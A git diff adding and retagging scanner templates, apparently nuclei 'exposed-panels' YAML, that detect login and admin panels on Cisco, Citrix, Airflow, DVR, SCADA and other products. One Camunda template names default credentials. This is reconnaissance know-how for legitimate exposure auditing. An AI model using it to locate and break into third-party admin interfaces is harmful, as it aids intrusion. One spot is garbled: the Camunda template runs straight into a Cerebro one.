+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
+ tags: panel,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Adobe Media Server '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml
new file mode 100644
index 0000000000..957677ccf9
--- /dev/null
+++ b/exposed-panels/advance-setup.yaml
@@ -0,0 +1,22 @@
+id: advance-setup-login
+
+info:
+ name: Advance Setup Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6819
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Advanced Setup - Security - Admin User Name & Password '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/aims-password-mgmt-client.yaml b/exposed-panels/aims-password-mgmt-client.yaml
index b66307b2cf..76998f88a1 100644
--- a/exposed-panels/aims-password-mgmt-client.yaml
+++ b/exposed-panels/aims-password-mgmt-client.yaml
@@ -4,6 +4,7 @@ info:
name: Aims Password Management Client Detect
author: iamthefrogy
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/aims-password-portal.yaml b/exposed-panels/aims-password-portal.yaml
new file mode 100644
index 0000000000..eb21d8e0eb
--- /dev/null
+++ b/exposed-panels/aims-password-portal.yaml
@@ -0,0 +1,22 @@
+id: aims-password-portal
+
+info:
+ name: AIMS Password Management Portal
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6576
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/aims/ps/default.aspx'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Password Management Client '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml
deleted file mode 100644
index 33d01d09c8..0000000000
--- a/exposed-panels/airflow-exposure.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: airflow-exposure
-
-info:
- name: Apache Airflow Exposure / Unauthenticated Access
- author: pd-team
- severity: medium
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- - '{{BaseURL}}/admin/'
- matchers:
- - type: word
- words:
- - 'Airflow - DAGs '
- - ''
- condition: and
\ No newline at end of file
diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml
new file mode 100644
index 0000000000..3b97fec8be
--- /dev/null
+++ b/exposed-panels/airflow-panel.yaml
@@ -0,0 +1,24 @@
+id: airflow-panel
+
+info:
+ name: Airflow Admin login
+ author: pdteam
+ severity: info
+ tags: panel,apache,airflow
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin/airflow/login"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "Airflow - Login"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/akamai-cloudtest.yaml b/exposed-panels/akamai-cloudtest.yaml
new file mode 100644
index 0000000000..190c8a3050
--- /dev/null
+++ b/exposed-panels/akamai-cloudtest.yaml
@@ -0,0 +1,24 @@
+id: akamai-cloudtest
+
+info:
+ name: Akamai CloudTest Panel
+ author: emadshanab
+ severity: info
+ tags: panel,akamai
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/concerto/Login?goto=Central"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Akamai Inc. All rights reserved"
+ - "Akamai CloudTest"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml
index a55efd2371..6dbaa22d28 100644
--- a/exposed-panels/ambari-exposure.yaml
+++ b/exposed-panels/ambari-exposure.yaml
@@ -2,8 +2,9 @@ id: ambari-exposure
info:
name: Apache Ambari Exposure / Unauthenticated Access
- author: pd-team
+ author: pdteam
severity: medium
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml
index b5e5ab05fb..72789c4755 100644
--- a/exposed-panels/ansible-tower-exposure.yaml
+++ b/exposed-panels/ansible-tower-exposure.yaml
@@ -2,8 +2,9 @@ id: ansible-tower-exposure
info:
name: Ansible Tower Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/apiman-panel.yaml b/exposed-panels/apiman-panel.yaml
new file mode 100644
index 0000000000..eb3fa9f385
--- /dev/null
+++ b/exposed-panels/apiman-panel.yaml
@@ -0,0 +1,24 @@
+id: apiman-panel
+
+info:
+ name: Apiman Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a Apiman instance via the login redirection
+ tags: panel,apiman
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/apimanui/api-manager"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "/auth/realms/apiman"
+ part: header
+
+ - type: status
+ status:
+ - 302
\ No newline at end of file
diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml
index 6b6d3e01f3..4fd18bcda4 100644
--- a/exposed-panels/atlassian-crowd-panel.yaml
+++ b/exposed-panels/atlassian-crowd-panel.yaml
@@ -4,6 +4,8 @@ info:
name: Atlassian Crowd panel detect
author: organiccrap
severity: info
+ tags: panel
+
requests:
- method: GET
path:
diff --git a/exposed-panels/avtech-dvr-exposure.yaml b/exposed-panels/avtech-dvr-exposure.yaml
new file mode 100644
index 0000000000..f3f362bcc8
--- /dev/null
+++ b/exposed-panels/avtech-dvr-exposure.yaml
@@ -0,0 +1,26 @@
+id: avtech-dvr-exposure
+
+info:
+ name: Avtech AVC798HA DVR Information Exposure
+ description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication.
+ reference: http://www.avtech.com.tw/
+ author: geeknik
+ severity: low
+ tags: dvr,exposure,avtech
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Firmware.Version="
+ - "MACAddress="
+ - "Product.Type="
+ condition: and
diff --git a/exposed-panels/bitrix-panel.yaml b/exposed-panels/bitrix-panel.yaml
new file mode 100644
index 0000000000..6dcda6cbdf
--- /dev/null
+++ b/exposed-panels/bitrix-panel.yaml
@@ -0,0 +1,27 @@
+id: bitrix-login
+
+info:
+ name: Bitrix Login Panel
+ author: juicypotato1
+ severity: info
+ tags: panel,bitrix
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/bitrix/admin/"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "USER_LOGIN"
+ - "/bitrix/js/main/"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/blue-iris-login.yaml b/exposed-panels/blue-iris-login.yaml
new file mode 100644
index 0000000000..224b1d1b46
--- /dev/null
+++ b/exposed-panels/blue-iris-login.yaml
@@ -0,0 +1,22 @@
+id: blue-iris-login
+
+info:
+ name: Blue Iris Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6814
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Blue Iris Login '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/calendarix-panel.yaml b/exposed-panels/calendarix-panel.yaml
new file mode 100644
index 0000000000..a8581f03b6
--- /dev/null
+++ b/exposed-panels/calendarix-panel.yaml
@@ -0,0 +1,22 @@
+id: calendarix-panel
+
+info:
+ name: Calendarix login detect
+ author: r3dg33k
+ severity: info
+ tags: panel,calendarix
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/calendarix/admin/cal_login.php'
+ - '{{BaseURL}}/calendar/admin/cal_login.php'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - 'Calendarix Admin Login'
diff --git a/exposed-panels/call-break-cms.yaml b/exposed-panels/call-break-cms.yaml
new file mode 100644
index 0000000000..de74bfa1de
--- /dev/null
+++ b/exposed-panels/call-break-cms.yaml
@@ -0,0 +1,18 @@
+id: call-break-cms
+
+info:
+ name: Call Break CMS
+ author: dhiyaneshDk
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: word
+ words:
+ - 'Call Break CMS '
+ condition: and
diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml
new file mode 100644
index 0000000000..ca5b5f04c2
--- /dev/null
+++ b/exposed-panels/camunda-login-panel.yaml
@@ -0,0 +1,31 @@
+id: camunda-login-panel
+info:
+ name: Camunda Login panel
+ author: alifathi-h1
+ severity: info
+ description: Default Credentials of demo:demo on Camunda application.
+ reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
+ tags: camunda,panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/app/welcome/default/#!/login'
+ - '{{BaseURL}}/camunda/app/welcome/default/#!/login'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Camunda Welcome"
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Cerebro"
+ part: body
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "([a-z0-9.]+) "
diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml
new file mode 100644
index 0000000000..4aa65b0e49
--- /dev/null
+++ b/exposed-panels/checkmarx-panel.yaml
@@ -0,0 +1,19 @@
+id: checkmarx-panel-detect
+
+info:
+ name: Checkmarx WebClient detector
+ author: joanbono
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cxwebclient/Login.aspx"
+ headers:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ matchers:
+ - type: word
+ words:
+ - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
+ part: body
diff --git a/exposed-panels/checkpoint-panel.yaml b/exposed-panels/checkpoint-panel.yaml
new file mode 100644
index 0000000000..7fd4c52612
--- /dev/null
+++ b/exposed-panels/checkpoint-panel.yaml
@@ -0,0 +1,29 @@
+id: checkpoint-panel
+
+info:
+ name: Checkpoint Panel
+ author: 0x240x23elu
+ severity: info
+ tags: panel,checkpoint
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sslvpn/Login/Login"
+ - "{{BaseURL}}/Login/Login"
+ matchers-condition: and
+ redirects: true
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "Check Point Software Technologies Ltd. All rights reserved."
+ - "/Login/images/CompanyLogo.png"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/exposed-panels/circarlife-setup.yaml b/exposed-panels/circarlife-setup.yaml
new file mode 100644
index 0000000000..f1be4d4778
--- /dev/null
+++ b/exposed-panels/circarlife-setup.yaml
@@ -0,0 +1,30 @@
+id: circarlife-setup
+
+info:
+ name: Exposed CirCarLife Setup Page
+ author: geeknik
+ description: CirCarLife is an internet-connected electric vehicle charging station
+ reference: https://circontrol.com/
+ severity: critical
+ tags: scada,circontrorl,circarlife,setup,exposure,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/html/setup.html"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "CirCarLife Scada"
+ - type: word
+ words:
+ - "- setup "
+ - "Network setup"
+ - "Modem setup"
+ - "Security setup"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/cisco-asa-panel.yaml b/exposed-panels/cisco-asa-panel.yaml
index c2dff32b9b..0db529493b 100644
--- a/exposed-panels/cisco-asa-panel.yaml
+++ b/exposed-panels/cisco-asa-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Cisco ASA VPN panel detect
author: organiccrap
severity: info
+ tags: cisco,panel
requests:
- method: GET
diff --git a/exposed-panels/cisco-finesse-login.yaml b/exposed-panels/cisco-finesse-login.yaml
new file mode 100644
index 0000000000..0944959e91
--- /dev/null
+++ b/exposed-panels/cisco-finesse-login.yaml
@@ -0,0 +1,22 @@
+id: cisco-finesse-login
+
+info:
+ name: Cisco Finesse Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6824
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Sign in to Cisco Finesse '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco-integrated-login.yaml
new file mode 100644
index 0000000000..0804d5a189
--- /dev/null
+++ b/exposed-panels/cisco-integrated-login.yaml
@@ -0,0 +1,22 @@
+id: cisco-integrated-login
+
+info:
+ name: Cisco Integrated Management Controller Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/3859
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Cisco Integrated Management Controller Login '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/cisco-sd-wan.yaml b/exposed-panels/cisco-sd-wan.yaml
new file mode 100644
index 0000000000..6376c9a8ca
--- /dev/null
+++ b/exposed-panels/cisco-sd-wan.yaml
@@ -0,0 +1,25 @@
+id: cisco-sd-wan
+
+info:
+ name: Cisco SD-WAN panel
+ author: z3bd
+ severity: info
+ reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "SD-Wan Center"
+ part: body
\ No newline at end of file
diff --git a/exposed-panels/cisco-secure-desktop.yaml b/exposed-panels/cisco-secure-desktop.yaml
new file mode 100644
index 0000000000..1e19037f4f
--- /dev/null
+++ b/exposed-panels/cisco-secure-desktop.yaml
@@ -0,0 +1,27 @@
+id: cisco-secure-desktop
+
+info:
+ name: Cisco Secure Desktop
+ author: pdteam
+ severity: info
+ tags: cisco,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CACHE/sdesktop/install/start.htm"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Installation "
+ - "WebLaunch"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml
new file mode 100644
index 0000000000..8ebd1577a1
--- /dev/null
+++ b/exposed-panels/cisco-security-details.yaml
@@ -0,0 +1,22 @@
+id: cisco-security-details
+
+info:
+ name: Cisco Meraki cloud & Security Appliance details
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6708
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#connection'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Your client connection'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/cisco-sendgrid.yaml b/exposed-panels/cisco-sendgrid.yaml
new file mode 100644
index 0000000000..d9708bf9f3
--- /dev/null
+++ b/exposed-panels/cisco-sendgrid.yaml
@@ -0,0 +1,30 @@
+id: cisco-sendgrid
+
+info:
+ name: Cisco ServiceGrid
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/pages/sdcall/Login.jsp'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^Cisco ServiceGrid (.*)<\/title>$'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Version ([0-9.]+)<\/div>'
diff --git a/exposed-panels/citrix-adc-gateway-detect.yaml b/exposed-panels/citrix-adc-gateway-detect.yaml
index c8db1fce4c..259215205d 100644
--- a/exposed-panels/citrix-adc-gateway-detect.yaml
+++ b/exposed-panels/citrix-adc-gateway-detect.yaml
@@ -1,8 +1,11 @@
id: citrix-adc-gateway-panel
+
info:
name: Citrix ADC Gateway detect
author: organiccrap
severity: info
+ tags: panel
+
requests:
- method: GET
path:
@@ -10,6 +13,7 @@ requests:
- '{{BaseURL}}/logon/LogonPoint/custom.html'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+
matchers:
- type: word
words:
diff --git a/exposed-panels/citrix-vpn-detect.yaml b/exposed-panels/citrix-vpn-detect.yaml
index 7ce6621e15..6dad344382 100644
--- a/exposed-panels/citrix-vpn-detect.yaml
+++ b/exposed-panels/citrix-vpn-detect.yaml
@@ -2,8 +2,9 @@ id: citrix-vpn-detect
info:
name: Citrix VPN Detection
- author: pd-team
+ author: pdteam
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/clave-login-panel.yaml b/exposed-panels/clave-login-panel.yaml
new file mode 100644
index 0000000000..6b10058d50
--- /dev/null
+++ b/exposed-panels/clave-login-panel.yaml
@@ -0,0 +1,23 @@
+id: clave-login-panel
+
+info:
+ name: Clave login panel
+ author: __Fazal
+ severity: info
+ tags: panel,clave
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin.php'
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Clave"
\ No newline at end of file
diff --git a/exposed-panels/clearpass-policy-manager.yaml b/exposed-panels/clearpass-policy-manager.yaml
new file mode 100644
index 0000000000..57a79fe6af
--- /dev/null
+++ b/exposed-panels/clearpass-policy-manager.yaml
@@ -0,0 +1,23 @@
+id: clearpass-policy-manager
+
+info:
+ name: ClearPass Policy Manager - Aruba Networks
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+ tags: panel,aruba
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/tips/tipsLogin.action'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
ClearPass Policy Manager - Aruba Networks '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/codemeter-webadmin-panel.yaml b/exposed-panels/codemeter-webadmin-panel.yaml
new file mode 100644
index 0000000000..bcb121e897
--- /dev/null
+++ b/exposed-panels/codemeter-webadmin-panel.yaml
@@ -0,0 +1,25 @@
+id: codemeter-webadmin-panel
+
+info:
+ name: CodeMeter WebAdmin Panel
+ author: Techryptic (@Tech)
+ severity: high
+ description: Panel on CodeMeter WebAdmin application.
+ tags: codemeter,webadmin,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: CmWebAdminSession"
+ part: header
+
+ - type: status
+ status:
+ - 301
+ - 302
diff --git a/exposed-panels/coldfusion-administrator-login.yaml b/exposed-panels/coldfusion-administrator-login.yaml
new file mode 100644
index 0000000000..217efea2ee
--- /dev/null
+++ b/exposed-panels/coldfusion-administrator-login.yaml
@@ -0,0 +1,23 @@
+id: coldfusion-administrator-login
+
+info:
+ name: ColdFusion Administrator Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
+ tags: panel,coldfusion,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
ColdFusion Administrator Login '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/compal-panel.yaml b/exposed-panels/compal-panel.yaml
index c88898d88a..5682d683b3 100644
--- a/exposed-panels/compal-panel.yaml
+++ b/exposed-panels/compal-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Compal CH7465LG panel detect
author: fabaff
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/cortex-xsoar-login.yaml b/exposed-panels/cortex-xsoar-login.yaml
new file mode 100644
index 0000000000..8f827c4fab
--- /dev/null
+++ b/exposed-panels/cortex-xsoar-login.yaml
@@ -0,0 +1,23 @@
+id: cortex-xsoar-login
+
+info:
+ name: Cortex XSOAR Login Panel
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Cortex+XSOAR%22
+ tags: panel,soar
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
Cortex XSOAR '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml
index 3f1b895540..376f2370b6 100644
--- a/exposed-panels/couchdb-exposure.yaml
+++ b/exposed-panels/couchdb-exposure.yaml
@@ -3,6 +3,7 @@ info:
name: couchdb exposure
author: organiccrap
severity: low
+ tags: panel
requests:
- method: GET
@@ -10,10 +11,15 @@ requests:
- '{{BaseURL}}/_all_dbs'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ matchers-condition: and
matchers:
- type: word
words:
- CouchDB/
- Erlang OTP/
part: header
- condition: and
\ No newline at end of file
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/couchdb-fauxton.yaml b/exposed-panels/couchdb-fauxton.yaml
index 7afd969b7f..5ca46a8540 100644
--- a/exposed-panels/couchdb-fauxton.yaml
+++ b/exposed-panels/couchdb-fauxton.yaml
@@ -2,8 +2,9 @@ id: couchdb-fauxton
info:
name: Apache CouchDB Fauxton Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/crush-ftp-login.yaml b/exposed-panels/crush-ftp-login.yaml
new file mode 100644
index 0000000000..48298e19ba
--- /dev/null
+++ b/exposed-panels/crush-ftp-login.yaml
@@ -0,0 +1,22 @@
+id: crushftp-login
+
+info:
+ name: CrushFTP WebInterface
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6591
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/WebInterface/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
CrushFTP WebInterface '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/crxde.yaml b/exposed-panels/crxde-lite.yaml
similarity index 88%
rename from exposed-panels/crxde.yaml
rename to exposed-panels/crxde-lite.yaml
index 81e66661bc..3b578f65e1 100644
--- a/exposed-panels/crxde.yaml
+++ b/exposed-panels/crxde-lite.yaml
@@ -1,9 +1,10 @@
-id: crxde
+id: crxde-lite
info:
name: CRXDE Lite
author: nadino
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/csod-panel.yaml b/exposed-panels/csod-panel.yaml
new file mode 100644
index 0000000000..b1bbc95572
--- /dev/null
+++ b/exposed-panels/csod-panel.yaml
@@ -0,0 +1,20 @@
+id: csod-panel
+info:
+ name: CornerStoneOnDemand Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page
+ tags: panel,csod
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ redirects: true
+ max-redirects: 5
+ matchers:
+ - type: word
+ words:
+ - "csod-custom"
+ - "csodcommon"
+ part: body
+ condition: or
diff --git a/exposed-panels/cx-cloud-login.yaml b/exposed-panels/cx-cloud-login.yaml
new file mode 100644
index 0000000000..9533a1d158
--- /dev/null
+++ b/exposed-panels/cx-cloud-login.yaml
@@ -0,0 +1,18 @@
+id: cx-cloud-login
+
+info:
+ name: CX Cloud
+ author: dhiyaneshDk
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/cxcum/'
+
+ matchers:
+ - type: word
+ words:
+ - "
CX Cloud "
\ No newline at end of file
diff --git a/exposed-panels/d-link-wireless.yaml b/exposed-panels/d-link-wireless.yaml
new file mode 100644
index 0000000000..d896e4fb9c
--- /dev/null
+++ b/exposed-panels/d-link-wireless.yaml
@@ -0,0 +1,23 @@
+id: dlink-wireless
+
+info:
+ name: D-Link Wireless Router Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6784
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/status.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME '
+ - '
D-LINK SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/dell-openmanager-login.yaml b/exposed-panels/dell-openmanager-login.yaml
new file mode 100644
index 0000000000..9730b557ef
--- /dev/null
+++ b/exposed-panels/dell-openmanager-login.yaml
@@ -0,0 +1,26 @@
+id: dell-openmanager-login
+
+info:
+ name: Dell OpenManage Switch Administrator
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
+ tags: panel,dell
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/config/authentication_page.htm'
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - '
Dell OpenManage Switch Administrator '
+
+ - type: word
+ words:
+ - '
Log In '
+ - 'device/logOff_up_menu1.htm'
+ condition: and
diff --git a/exposed-panels/dell-wyse-management-suite-login.yaml b/exposed-panels/dell-wyse-management-suite-login.yaml
new file mode 100644
index 0000000000..09824b09b1
--- /dev/null
+++ b/exposed-panels/dell-wyse-management-suite-login.yaml
@@ -0,0 +1,23 @@
+id: dell-wyse-management-suite-login
+
+info:
+ name: Dell Wyse Management Suite Login Panel
+ author: gy741
+ severity: info
+ reference: https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/
+ tags: panel,dell
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ccm-web/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
Wyse Management Suite "
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/django-admin-panel.yaml b/exposed-panels/django-admin-panel.yaml
index 17d2cbf5b8..802041e0f9 100644
--- a/exposed-panels/django-admin-panel.yaml
+++ b/exposed-panels/django-admin-panel.yaml
@@ -2,8 +2,9 @@ id: django-admin-panel
info:
name: Python Django Admin Panel
- author: pd-team
- severity: low
+ author: pdteam
+ severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml
new file mode 100644
index 0000000000..15846058a0
--- /dev/null
+++ b/exposed-panels/dotcms-admin-panel.yaml
@@ -0,0 +1,18 @@
+id: dotcms-admin-panel
+
+info:
+ name: dotAdmin Panel
+ author: impramodsargar
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dotAdmin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
dotCMS Content Management Platform '
diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml
index 218b432e50..cdeb366871 100644
--- a/exposed-panels/druid-console-exposure.yaml
+++ b/exposed-panels/druid-console-exposure.yaml
@@ -2,8 +2,9 @@ id: druid-console-exposure
info:
name: Alibaba Druid Console Exposure
- author: pd-team
+ author: pdteam
severity: medium
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml
new file mode 100644
index 0000000000..85879462c6
--- /dev/null
+++ b/exposed-panels/ems-login-panel.yaml
@@ -0,0 +1,22 @@
+id: ems-login-panel
+
+info:
+ name: EMS Login page detection
+ author: __Fazal
+ severity: info
+ tags: panel,ems
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/EMSWebClient/Login.aspx'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "EMS Web Client - Login"
diff --git a/exposed-panels/exposed-nomad.yaml b/exposed-panels/exposed-nomad.yaml
new file mode 100644
index 0000000000..f4a5f4c958
--- /dev/null
+++ b/exposed-panels/exposed-nomad.yaml
@@ -0,0 +1,30 @@
+id: exposed-nomad
+
+info:
+ name: Exposed Nomad Jobs
+ author: pdteam
+ severity: high
+ tags: nomad,devops,hashicorp,panel
+ reference: https://www.nomadproject.io/docs/internals/security
+
